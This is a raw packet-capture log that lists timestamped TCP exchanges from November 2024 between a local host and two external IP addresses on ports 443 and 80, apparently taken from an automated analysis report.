                                                                                                                Nov 15, 2024 18:14:13.314430952 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.314445972 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.314462900 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.314513922 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.314526081 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.315040112 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.315112114 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.315125942 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.315220118 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.315263033 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.315287113 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.315299988 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.315356970 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.315922022 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.316000938 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.316015959 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.316168070 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.316211939 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.316236973 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.316248894 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.316277981 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.316313028 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.316382885 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.316397905 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.316982985 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.317028046 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.317068100 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.317080021 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.317109108 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.317286968 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.317363977 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.317378044 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.317900896 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.317945957 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.317979097 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.317991972 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.318020105 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.318216085 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.318264008 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.318288088 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.318301916 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.318331957 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.318941116 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.319015980 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.319029093 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.319118023 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.319171906 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.319190025 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.319202900 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.319236994 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.319797039 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.319852114 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.319879055 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.319894075 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.319922924 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.320090055 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.320158005 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.320173979 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.320194006 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.320269108 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.320281982 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.320784092 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.320852995 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.320868015 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.320969105 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.321038008 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.321050882 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.321083069 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.321147919 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.321160078 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.321782112 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.321840048 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.321858883 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.321871042 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.321911097 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.350897074 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.351170063 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.351202965 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.401679039 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.434648991 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.434695959 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.434778929 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.434829950 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.434843063 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.434863091 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.434904099 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.434912920 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.434921026 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.434983969 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.434992075 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.435039997 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.435302019 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.435375929 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.435383081 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.435493946 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.435559034 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.435564041 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.435693979 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.435755014 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.435762882 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.436115980 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.436176062 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.436182022 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.436270952 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.436328888 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.436337948 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.436502934 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.436561108 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.436568022 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.436947107 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.437009096 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.437015057 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.437149048 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.437207937 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.437216043 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.437319040 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.437376976 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.437383890 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.437489986 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.437549114 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.437556028 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.438019991 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.438079119 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.438087940 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.438194990 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.438252926 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.438261032 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.438391924 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.438448906 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.438457966 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.438877106 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.438934088 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.438942909 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.439090014 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.439148903 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.439157009 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.439291954 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.439344883 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.439352989 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.439467907 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.439527988 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.439538002 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.440020084 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.440080881 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.440088034 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.440212965 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.440268993 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.440275908 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.440413952 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.440473080 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.440480947 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.440685987 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.440742016 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.440748930 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.441157103 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.441217899 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.441227913 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.441322088 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.441378117 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.441385031 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.441493034 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.441551924 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.441560030 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.441689014 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.441745996 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.441755056 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.442004919 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.442065001 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.442075014 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.442230940 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.442290068 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.442298889 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.442332983 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.442389011 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.442398071 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.442614079 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.442667007 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.442673922 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.442842960 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.442899942 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.442907095 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.443034887 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.443099022 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.443106890 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.443286896 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.443342924 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.443352938 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.443510056 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.443571091 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.443578959 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.443672895 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.443728924 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.443734884 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.443793058 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.443799019 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.443806887 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.443835974 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.444236040 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.444307089 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.444318056 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.444329023 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.444380045 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.444385052 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.444408894 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.444444895 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.444452047 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.444477081 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.445211887 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.445261002 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.445286036 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.445291996 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.445334911 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.445343018 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.445399046 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.445405960 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.445890903 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.445930004 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.445952892 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.445959091 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.445997953 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.446546078 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.446633101 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.446640015 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.468066931 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.468187094 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.468252897 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.511179924 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.518069029 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.518203020 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.518260002 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.542738914 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.542838097 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.542870998 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.543519020 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.543601036 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.543617010 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.550144911 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.550249100 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.550262928 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.551230907 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.551309109 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.551341057 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.551795959 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.551867008 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.551879883 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.552470922 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.552537918 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.552551031 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.553188086 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.553265095 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.553278923 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.554682970 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.554753065 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.554766893 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.554953098 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.555015087 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.555027962 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.555233002 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.555327892 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.555341959 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.555659056 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.555732965 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.555746078 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.555953026 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.556022882 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.556035995 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.556289911 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.556359053 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.556370974 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.557002068 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.557071924 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.557085037 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.557591915 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.557660103 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.557673931 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.557770967 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.557836056 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.557847977 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.558108091 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.558176041 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.558188915 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.558345079 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.558410883 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.558423042 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.558873892 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.558938026 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.558949947 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.559480906 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.559547901 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.559561968 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.559758902 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.559827089 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.559839964 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.560030937 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.560094118 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.560106993 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.560300112 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.560365915 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.560378075 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.560528994 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.560594082 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.560607910 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.560911894 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.560983896 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.560997009 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.561503887 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.561567068 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.561579943 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.561919928 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.561985016 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.561996937 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.562052965 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.563074112 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.565711975 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:16.432041883 CET4973080192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:26.460429907 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:26.465701103 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:26.465878963 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:26.465945005 CET4973880192.168.2.4192.3.243.136
